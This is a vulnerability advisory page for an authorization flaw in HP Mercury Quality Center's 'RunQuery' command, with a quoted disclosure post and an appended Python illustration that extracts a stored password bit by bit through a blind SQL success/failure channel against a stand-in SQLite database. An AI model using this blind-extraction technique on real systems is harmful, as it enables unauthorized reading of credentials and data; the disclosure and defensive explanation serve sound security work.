SecurityTracker.com
SecurityTracker Archives

Category:   Application (Generic)  >   HPE Quality Center
Vendors:   HPE
HP Mercury Quality Center Lets Remote Authenticated Users Execute SQL Commands
SecurityTracker Alert ID:  1017842
SecurityTracker URL:  http://securitytracker.com/id/1017842
CVE Reference:   CVE-2007-1882   (Links to External Site)
Updated:  May 16 2008
Original Entry Date:  Apr 3 2007
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 9.0 build 9.1.0.4352
Description:   A vulnerability was reported in HP Mercury Quality Center. A remote authenticated user can execute arbitrary SQL commands on the underlying database.

The Quality Center server exposes a 'RunQuery' command to any logged-on user, regardless of role. A remote authenticated user can invoke it to execute arbitrary SQL statements on the project database (MSDE, Microsoft SQL Server or Oracle). This is not an injection flaw in an existing query; the command itself accepts and runs whatever SQL the user supplies, so the defect is a missing authorization check rather than missing input handling. The reporter demonstrated it only as a blind channel (the statement executes and no result rows are returned), but notes that retrieving results is likely possible with more work.

Isma Khan reported this vulnerability.

Impact:   A remote authenticated user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.hp.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Solaris - SunOS), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] HP Mercury Quality Center Any SQL execution

Vendor: HP
Product: Mercury Quality Center
Version: 9.0 build 9.1.0.4352
Vendor Informed: No

HP Mercury Quality Center is a test management product for companies to do
software testing and quality assurance.

HP Mercury Quality Center has an additional guest command on the server which
allows any user who is logged on to run a SQL command of their choosing.
This command, called 'RunQuery', is not SQL injection but allows any SQL to
run. I have only managed to get this to work as a blind SQL command (no
results returned), but returning results is probably possible with more
work.

Attached is a small Perl script which pretends to be the HPMQC client,
logs in as a normal user, connects to a domain and project and runs
SQL. The last step in the program, which runs the SQL, will generate an error but
will work.

HPMQC can use MSDE, full MS SQL Server or an Oracle database.

[Attachment: HP_MQC_Run_Any_Query.pl]
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
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
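The post above says the author only got 'RunQuery' to work blind: the statement executes, no rows come back, and the last step "will generate an error but will work". An error-or-no-error signal is already a one-bit channel, and that is enough to read data. The following Python is an added illustration of that point, not the Perl script from the post and not HP Quality Center's client protocol: the QC server and its database are replaced by an in-memory SQLite database holding constructed sample rows, and the names RunQueryOracle, BlindExtractor, the probe table blind_probe and the users table are all assumptions made for the example. Only the primitive is kept faithful to the report: arbitrary SQL runs, and the caller learns nothing but success or failure.

```python
"""Blind data extraction through a 'run any SQL, see only success/failure' oracle.

Added example. Not HP Quality Center's protocol or schema: the server and its
database are a stand-in (in-memory SQLite, constructed rows). The attacker is
assumed to be an authenticated, unprivileged user, as in the advisory.
"""
import sqlite3


class RunQueryOracle:
    """Stand-in for a server-side 'RunQuery' command.

    run_query() executes whatever SQL it is given, returns no rows, and reports
    only whether the statement ran without error. That is the whole interface.
    """

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        # Constructed sample data; the real product's tables are not modelled.
        self.db.execute("CREATE TABLE users (user_name TEXT, user_password TEXT)")
        self.db.executemany(
            "INSERT INTO users VALUES (?, ?)",
            [("admin", "s3cret"), ("tester", "hunter2")],
        )
        self.db.commit()
        self.queries = 0  # round trips spent; the cost of a one-bit channel

    def run_query(self, sql: str) -> bool:
        """Execute arbitrary SQL; True if it ran, False on any database error."""
        self.queries += 1
        try:
            self.db.execute(sql)
            return True
        except sqlite3.Error:
            return False


class BlindExtractor:
    """Turns the success/failure oracle into a read channel.

    The truth value of a condition is written into a table whose CHECK
    constraint accepts only 1. A false condition inserts 0, the constraint
    fails, and the failure is the one bit that leaks. Binary search over that
    bit recovers integers, and therefore string lengths and character codes.
    """

    PROBE_TABLE = "blind_probe"  # assumed name, created by the attacker

    def __init__(self, oracle: RunQueryOracle) -> None:
        self.oracle = oracle
        if not oracle.run_query(
            f"CREATE TEMP TABLE {self.PROBE_TABLE} (v INTEGER CHECK (v = 1))"
        ):
            raise RuntimeError("could not create probe table")

    def ask(self, condition: str) -> bool:
        """One probe: True iff `condition` evaluates to true in the database.

        A NULL condition (for example a subquery matching no row) takes the
        ELSE branch and reads as False, so the search still terminates.
        """
        return self.oracle.run_query(
            f"INSERT INTO {self.PROBE_TABLE} "
            f"SELECT CASE WHEN ({condition}) THEN 1 ELSE 0 END"
        )

    def search(self, expr: str, lo: int, hi: int) -> int:
        """Binary-search the integer value of scalar `expr` within [lo, hi]."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"({expr}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def read_string(self, column: str, table: str, where: str,
                    max_len: int = 64) -> str:
        """Recover a text column one character at a time (ASCII assumed)."""
        row = f"FROM {table} WHERE {where}"
        length = self.search(f"SELECT length({column}) {row}", 0, max_len)
        chars = []
        for pos in range(1, length + 1):
            code = self.search(
                f"SELECT unicode(substr({column}, {pos}, 1)) {row}", 0, 127)
            chars.append(chr(code))
        return "".join(chars)


def extract_password(user_name: str) -> str:
    """Convenience wrapper: read the stored password of `user_name`."""
    oracle = RunQueryOracle()
    extractor = BlindExtractor(oracle)
    return extractor.read_string(
        "user_password", "users", f"user_name = '{user_name}'")


if __name__ == "__main__":
    oracle = RunQueryOracle()
    extractor = BlindExtractor(oracle)
    secret = extractor.read_string("user_password", "users", "user_name = 'admin'")
    print(f"recovered {secret!r} in {oracle.queries} RunQuery calls")
```

The point for the defender is the one the advisory's "Cause: Access control error" already makes: a command that runs caller-supplied SQL cannot be made safe by filtering, because there is no injection to filter. It has to be gated by role on the server (or removed), and the audit question for any such product is which server commands are reachable by an ordinary authenticated user.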

Copyright 2020, SecurityGlobal.net LLC